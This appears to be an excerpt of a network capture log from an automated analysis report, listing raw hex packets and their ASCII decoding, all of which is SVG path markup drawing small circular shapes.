                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7033INData Raw: 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 39 36 2e 38 38 2c 31 38 31 2e 31 38 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M896.88,181.18a1.72,1.72,0,0,1-.78,2.24,2.51,2.51,0,0,1-3.33-.94,2.39,2.39,0,0,1,.51-2.89,2.24,2.24,0,0,1,2.89,0
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7049INData Raw: 2d 33 2e 33 34 2d 31 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 38 2e 33 35 2c 32 37 37 2e 33 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70
                                                                                                                                                                                                                                                                                        Data Ascii: -3.34-1,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M928.35,277.3a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><p
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7065INData Raw: 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 32 31 2c 32 39 33 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 33 38 2e 34 34 2c 33 30 30 2e 30 37 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.21,293.24a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M1038.44,300.07a1.7,1.7,0,0,1,.77-2.2,2.47
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7081INData Raw: 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 34 35 2c 32 30 35 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 31 30 30 37 2e 36 39 2c 32 31 32 2e 32 34 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d
                                                                                                                                                                                                                                                                                        Data Ascii: cls-4" d="M1007.45,205.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M1007.69,212.24a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7097INData Raw: 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 36 2e 39 33 2c 31 32 34 2e 34 32 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 32 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 37 37 2e 31 36 2c 31 33 31 2e 32 34 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: .08,0,0,1-.15-2.81"></path><path class="cls-4" d="M976.93,124.42a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.92,2.38,2.38,0,0,1-.51,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M977.16,131.24a1.7,1.7,0,0,1,.77-2.2,2.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7113INData Raw: 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 35 39 2e 38 32 2c 32 33 34 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: -.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M959.82,234.37a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.82"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7129INData Raw: 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 32 39 2e 33 2c 31 35 33 2e 33 37 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 36 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c
                                                                                                                                                                                                                                                                                        Data Ascii: ,1,3.29.93,2.37,2.37,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.81"></path><path class="cls-4" d="M929.3,153.37a1.69,1.69,0,0,1,.76-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.5,2.84,2.22,2.22,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7145INData Raw: 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 39 31 32 2e 31 38 2c 32 36 33 2e 33 33 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M912.18,263.33a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7161INData Raw: 4d 38 38 31 2e 34 33 2c 31 37 35 2e 35 61 31 2e 36 39 2c 31 2e 36 39 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 38 31 2e 36 36 2c 31 38 32 2e 33 33 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c
                                                                                                                                                                                                                                                                                        Data Ascii: M881.43,175.5a1.69,1.69,0,0,1,.77-2.2,2.46,2.46,0,0,1,3.28.93,2.36,2.36,0,0,1-.5,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M881.66,182.33a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7177INData Raw: 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 33 31 2c 32 38 35 2e 34 35 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 36 34 2e 35 34 2c 32 39 32 2e 32 38 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33
                                                                                                                                                                                                                                                                                        Data Ascii: </path><path class="cls-4" d="M864.31,285.45a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.36,2.36,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M864.54,292.28a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7193INData Raw: 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 33 2e 37 39 2c 32 30 34 2e 34 36 61 31 2e 37 31 2c 31 2e 37 31 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 31 2c 32 2e 34 39 2c 32 2e 34 39 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 34 2c 32 31 31 2e 32 38 61 31 2e 37 2c 31 2e 37 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-2.85,0,2.09,2.09,0,0,1-.16-2.81"></path><path class="cls-4" d="M833.79,204.46a1.71,1.71,0,0,1,.77-2.21,2.49,2.49,0,0,1,3.29.93,2.37,2.37,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.08,2.08,0,0,1-.15-2.81"></path><path class="cls-4" d="M834,211.28a1.7,1.7,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7209INData Raw: 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 30 33 2e 32 37 2c 31 32 33 2e 34 36 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 33 2e 32 38 2e 39 32 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 35 2c 32 2e 32 32 2c 32 2e 32 32 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 38 2c 32 2e 30 38 2c 30 2c 30 2c 31 2d 2e 31 36 2d 32 2e 38 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.1,2.1,0,0,1-.15-2.82"></path><path class="cls-4" d="M803.27,123.46a1.7,1.7,0,0,1,.77-2.2,2.47,2.47,0,0,1,3.28.92,2.37,2.37,0,0,1-.5,2.85,2.22,2.22,0,0,1-2.85,0,2.08,2.08,0,0,1-.16-2.81"></path><path class="cls-4" d="M8
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7225INData Raw: 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 31 2c 32 2e 38 34 2c 32 2e 32 31 2c 32 2e 32 31 2c 30 2c 30 2c 31 2d 32 2e 38 35 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 36 2e 31 35 2c 32 33 33 2e 34 31 61 31 2e 37 2c 31 2e 37 2c 30 2c 30 2c 31 2c 2e 37 37 2d 32 2e 32 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 33 2e 32 39 2e 39 33 2c 32 2e 33 38 2c 32 2e 33 38 2c 30 2c 30 2c 31 2d 2e 35 2c 32 2e 38 34 2c 32 2e 32 33 2c 32 2e 32 33 2c 30 2c 30 2c 31 2d 32 2e 38 36 2c 30 2c 32 2e 30 39 2c 32 2e 30 39 2c 30 2c 30 2c 31 2d 2e 31 35 2d 32 2e 38 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: 9.93,2.38,2.38,0,0,1-.51,2.84,2.21,2.21,0,0,1-2.85,0,2.09,2.09,0,0,1-.15-2.82"></path><path class="cls-4" d="M786.15,233.41a1.7,1.7,0,0,1,.77-2.2,2.48,2.48,0,0,1,3.29.93,2.38,2.38,0,0,1-.5,2.84,2.23,2.23,0,0,1-2.86,0,2.09,2.09,0,0,1-.15-2.82"></path><path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7241INData Raw: 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 32 2c 32 36 37 2e 33 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 32 31 2e 37 31 2c 32 35 39 2e 35 38 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2e 30 35 2c 32 2e 36 38 2c 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: h class="cls-7" d="M522,267.3a1.91,1.91,0,0,1-.87,2.48,2.81,2.81,0,0,1-3.72-1,2.69,2.69,0,0,1,.57-3.22,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path class="cls-7" d="M521.71,259.58a1.91,1.91,0,0,1-.86,2.49,2.81,2.81,0,0,1-3.72-1.05,2.68,2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7257INData Raw: 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 34 31 2e 35 38 2c 31 35 30 2e 37 36 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2d 33 2e 37 31 2d 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 36 2d 33 2e 32 32 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63
                                                                                                                                                                                                                                                                                        Data Ascii: 2.66,2.66,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M541.58,150.76a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1-3.71-1,2.69,2.69,0,0,1,.56-3.22,2.52,2.52,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path c
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7273INData Raw: 38 2c 33 2e 31 37 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 35 39 2c 32 35 37 2e 37 32 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 36 2c 32 2e 34 39 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 32 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 37 36 2e 33 33 2c 32 35 30 61 31 2e 39 31 2c 31 2e 39 31 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 38 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                                                        Data Ascii: 8,3.17"></path><path class="cls-7" d="M576.59,257.72a1.91,1.91,0,0,1-.86,2.49,2.8,2.8,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.22,0,2.36,2.36,0,0,1,.18,3.18"></path><path class="cls-7" d="M576.33,250a1.91,1.91,0,0,1-.87,2.48,2.79,2.79,0,0,1
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:12 UTC7289INData Raw: 31 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 35 39 36 2e 32 2c 31 34 31 2e 31 38 61 31 2e 39 32 2c 31 2e 39 32 2c 30 2c 30 2c 31 2d 2e 38 37 2c 32 2e 34 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2d 33 2e 37 32 2d 31 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 35 37 2d 33 2e 32 31 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2c 33 2e 32 33 2c 30 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 31 37 2c 33 2e 31 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20
                                                                                                                                                                                                                                                                                        Data Ascii: 1,2.69,2.69,0,0,1,.57-3.21,2.51,2.51,0,0,1,3.23,0,2.36,2.36,0,0,1,.17,3.18"></path><path class="cls-7" d="M596.2,141.18a1.92,1.92,0,0,1-.87,2.49,2.81,2.81,0,0,1-3.72-1,2.68,2.68,0,0,1,.57-3.21,2.52,2.52,0,0,1,3.23,0,2.37,2.37,0,0,1,.17,3.18"></path><path
